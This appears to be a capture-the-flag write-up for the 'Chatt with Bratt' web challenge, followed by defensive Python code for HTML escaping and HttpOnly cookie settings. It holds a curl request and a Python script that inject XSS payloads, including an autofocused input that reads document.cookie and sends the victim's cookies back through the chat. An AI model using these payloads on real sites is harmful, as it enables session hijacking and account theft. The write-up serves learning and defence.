Chatt with Bratt [Web]


After announcing that he would be having an anonymous 1-on-1 AMA with randomly chosen, adoring fans, an engineering team hacked together a web app and likely forgot to patch some obvious security holes.


Chat application. You send messages as "Anon" to a person named "Bratt Pitt".

Including an image tag will make "Bratt Pitt" visit our server:

export ses="b6489e18-6184-11ea-bf69-e6d97c3cba85"

curl -svv '' \
    -H 'Content-Type: application/json' \
    -H "Cookie: chat_id=$ses; secret=none" \
    -d '{"content": "AAAA<img src=\"\"/>"}'

Since we have XSS, we can steal Bratt's cookies using an <input> tag with autofocus and onfocus attributes.

import requests

# Session id taken from the chat cookie used above
cookies = {
    'chat_id': 'b6489e18-6184-11ea-bf69-e6d97c3cba85',
    'secret': 'none',
}

headers = {
    'Content-Type': 'application/json',
}

# The input focuses itself as soon as the page renders, copies document.cookie
# into the message box and calls the page's own sendMessage()
data = {
    "content": """AAAAAAAAAA<input autofocus onfocus="document.getElementById('message').value = document.cookie;sendMessage();">""",
}

# Target URL was elided in the original write-up
response = requests.post('', headers=headers, cookies=cookies, json=data)
print(response.status_code, response.text)

Bratt will send us the flag through chat.
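The two holes this solve relies on are message content rendered as raw HTML and a session id that JavaScript can read from document.cookie. As an added example, not the challenge's own code, the snippet below shows the escaping and the cookie attributes that would have closed both; the function names, the html.escape-based rendering and the sample messages are my own constructions, not anything from the app.

```python
import html
import re

# Constructed sample messages: a benign one plus the two payloads from the write-up
SAMPLE_MESSAGES = [
    'hi Bratt',
    'AAAA<img src=""/>',
    'AAAAAAAAAA<input autofocus onfocus="document.getElementById(\'message\').value = document.cookie;sendMessage();">',
]

# Anything that still looks like a tag opener after escaping is a rendering bug
TAG_RE = re.compile(r'<\s*/?\s*[a-zA-Z]')


def escape_content(content: str) -> str:
    """Escape user-controlled text so '<', '>', '"' and "'" can neither open a
    tag nor break out of an attribute. This is the fix for rendering the
    message body as raw HTML."""
    return html.escape(content, quote=True)


def render_message(sender: str, content: str) -> str:
    """HTML fragment for one chat line; both fields are attacker-controlled."""
    return '<div class="msg"><b>{}</b>: {}</div>'.format(
        escape_content(sender), escape_content(content))


def contains_markup(text: str) -> bool:
    """Check for a rendering helper's output: True if a tag opener survived."""
    return TAG_RE.search(text) is not None


def session_cookie_header(chat_id: str) -> str:
    """Set-Cookie value a fix would send. HttpOnly keeps chat_id out of
    document.cookie, which is the exfiltration path the payload above uses;
    Secure and SameSite limit where the browser will send it."""
    return 'chat_id={}; HttpOnly; Secure; SameSite=Strict; Path=/'.format(chat_id)


def cookie_readable_by_script(set_cookie: str) -> bool:
    """Audit a Set-Cookie header: True when the cookie lacks HttpOnly and is
    therefore visible to any script running on the page."""
    attrs = [a.strip().lower() for a in set_cookie.split(';')[1:]]
    return 'httponly' not in attrs


if __name__ == '__main__':
    for m in SAMPLE_MESSAGES:
        body = escape_content(m)
        print('markup leaked' if contains_markup(body) else 'inert', '<-', body)
    print(session_cookie_header('example-id'))
```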